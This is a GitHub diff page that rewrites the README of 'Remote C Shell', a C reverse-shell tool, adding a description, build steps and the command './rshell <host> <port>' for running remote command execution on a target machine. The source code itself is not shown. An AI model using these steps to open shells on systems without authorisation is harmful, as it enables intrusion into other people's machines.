File tree Expand file tree Collapse file tree 1 file changed +44
-2
lines changed Expand file tree Collapse file tree 1 file changed +44
-2
lines changed Original file line number Diff line number Diff line change 1
- # Remote C Shell
1
+ # Remote C Shell 🐚
2
2
3
- ` usage : ./rshell host (port) `
3
+ Welcome to the Remote C Shell repository! This C-based reverse shell enables remote command execution on a target machine.
4
+
5
+ ## Usage 📋
6
+
7
+ To use the remote shell, run the following command:
8
+
9
+ ``` bash
10
+ ./rshell < host> < port>
11
+ ```
12
+
13
+ ## Files in This Repository 📂
14
+
15
+ - ` LICENSE ` : License information for the project.
16
+ - ` Makefile ` : Makefile to compile the project.
17
+ - ` README.md ` : This readme file.
18
+ - ` rshell.c ` : The source code for the reverse shell.
19
+
20
+ ## Getting Started 🚀
21
+
22
+ 1 . ** Clone the repository:**
23
+
24
+ ``` bash
25
+ git clone https://github.com/fenrirsec/RemoteCShell.git
26
+ cd RemoteCShell
27
+ ```
28
+
29
+ 2. ** Compile the source code:**
30
+
31
+ ` ` ` bash
32
+ make
33
+ ` ` `
34
+
35
+ 3. ** Run the reverse shell:**
36
+
37
+ ` ` ` bash
38
+ ./rshell < host> < port>
39
+ ` ` `
40
+
41
+ Replace ` < host> ` with the target IP address and ` < port> ` with the desired port number.
42
+
43
+ ---
44
+
45
+ Stay safe and use responsibly! 🛡️
You can’t perform that action at this time.
0 commit comments